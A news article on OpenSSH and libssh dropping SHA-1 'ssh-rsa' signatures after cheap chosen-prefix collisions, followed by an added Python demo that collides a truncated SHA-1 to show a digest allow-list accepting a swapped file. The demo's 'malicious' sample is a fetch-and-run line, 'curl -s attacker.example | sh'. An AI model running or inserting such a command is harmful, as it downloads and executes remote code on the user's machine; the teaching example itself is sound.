Popular hash algorithm being removed because it's too weak

The developers of two open source implementations of Secure Shell (SSH), the protocol used by millions of computers to create encrypted connections, have decided to stop supporting Secure Hash Algorithm 1 (SHA-1) because of growing security concerns. As Ars Technica noted, OpenSSH and libssh will no longer use SHA-1 to produce the digital signatures that authenticate SSH hosts and users. In its release notes, OpenSSH explained why it is dropping SHA-1, saying: "It is now possible to perform chosen-prefix attacks against the SHA-1 algorithm for less than $50,000. For this reason, we will be disabling the "ssh-rsa" public key signature algorithm by default in a near-future release. This algorithm is unfortunately still used widely despite the existence of better alternatives, being the only remaining public key signature algorithm specified by the original SSH RFCs."

The change affects the signature scheme, not the keys themselves: "ssh-rsa" means an RSA signature over a SHA-1 digest, and existing RSA keys keep working with the rsa-sha2-256 and rsa-sha2-512 signature algorithms (RFC 8332) that current OpenSSH releases already support. SHA-1 is a cryptographic hash function first published in 1995. It produces a 160-bit digest, usually written as 40 hexadecimal characters, and these digests are supposed to be unique for each message, file, or function that uses them.

Hash collisions

A collision, in cryptographic terms, is when two or more distinct inputs produce the same output digest, and researchers have warned for well over a decade that SHA-1 is weaker against collisions than its 160-bit output suggests. In 2017 the first practical SHA-1 collision was demonstrated, at an estimated cost of about $110,000 in rented computing time, leading several browsers, certificate authorities, and software update systems to abandon the algorithm, although some services and software have kept using it despite the risk. In January this year, researchers showed that an even more powerful attack, a chosen-prefix collision, could be carried out for about $45,000. In a chosen-prefix collision the attacker picks two arbitrary, different prefixes (for example a harmless file and a malicious one) and computes a suffix for each so that both completed documents have the same SHA-1 hash. The attacker can then obtain a signature, certificate, or allow-listed digest for the harmless version and substitute the malicious one, bypassing any integrity check that relies only on the SHA-1 digest. This is not a second-preimage attack: an existing document that the attacker did not construct cannot be matched this way, but any process in which the attacker supplies the data that gets hashed and signed is exposed.

While OpenSSH and libssh will no longer use SHA-1 for signatures, the hash function is still available in recent versions of OpenSSL. Via Ars Technica
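The substitution described above, shown as an added example that is not part of the original article and not code from OpenSSH, libssh, or the researchers: the script builds a chosen-prefix collision between a harmless script and a malicious one and then shows a digest-only integrity check accepting the malicious file. The real attack breaks all 160 bits of SHA-1 with cryptanalysis; this example stands in for that shortcut by truncating SHA-1 to 24 bits (the assumed toy parameter TRUNC_BYTES) so a plain birthday search finds the collision in a fraction of a second. The two "documents", the padding format, and the function names are constructed for illustration.

```python
import hashlib
from itertools import count

# Assumption: a 24-bit truncation of SHA-1 stands in for the cryptanalytic
# shortcut of the real chosen-prefix attack, which collides all 160 bits.
TRUNC_BYTES = 3


def weak_digest(data: bytes) -> bytes:
    """Truncated SHA-1 digest: the toy 'weak hash' used by the integrity check."""
    return hashlib.sha1(data).digest()[:TRUNC_BYTES]


def chosen_prefix_collision(prefix_a: bytes, prefix_b: bytes, table_size: int = 1 << 13):
    """Return (doc_a, doc_b): doc_a starts with prefix_a, doc_b with prefix_b,
    the two differ in content, yet weak_digest(doc_a) == weak_digest(doc_b).

    Birthday search: tabulate table_size padded variants of prefix_a, then
    walk padded variants of prefix_b until one lands on a tabulated digest.
    Padding is an ASCII comment line so both results stay valid shell text.
    """
    table = {}
    for i in range(table_size):
        doc_a = prefix_a + b"\n# " + format(i, "08x").encode()
        table.setdefault(weak_digest(doc_a), doc_a)
    for j in count():
        doc_b = prefix_b + b"\n# " + format(j, "08x").encode()
        d = weak_digest(doc_b)
        if d in table:
            return table[d], doc_b


class DigestAllowList:
    """An integrity check that trusts anything whose digest was approved earlier."""

    def __init__(self, digest_fn):
        self.digest_fn = digest_fn
        self.approved = set()

    def approve(self, doc: bytes) -> None:
        self.approved.add(self.digest_fn(doc))

    def verify(self, doc: bytes) -> bool:
        return self.digest_fn(doc) in self.approved


def demo() -> dict:
    """Attacker controls both prefixes, gets the harmless one approved,
    then submits the malicious one. Returns the outcome of each check."""
    harmless = b"#!/bin/sh\necho 'nightly build ok'"      # constructed sample
    malicious = b"#!/bin/sh\ncurl -s attacker.example | sh"  # constructed sample
    doc_a, doc_b = chosen_prefix_collision(harmless, malicious)

    weak_check = DigestAllowList(weak_digest)
    strong_check = DigestAllowList(lambda d: hashlib.sha256(d).digest())
    weak_check.approve(doc_a)    # reviewer only ever sees the harmless file
    strong_check.approve(doc_a)

    return {
        "distinct": doc_a != doc_b,
        "weak_accepts_malicious": weak_check.verify(doc_b),
        "sha256_accepts_malicious": strong_check.verify(doc_b),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the structure is that the reviewer's step is honest: it approves exactly the bytes it was shown. The failure is that approval is keyed on a digest the attacker could steer from both sides, which is why the fix in SSH is to change the signature algorithm rather than to vet inputs more carefully.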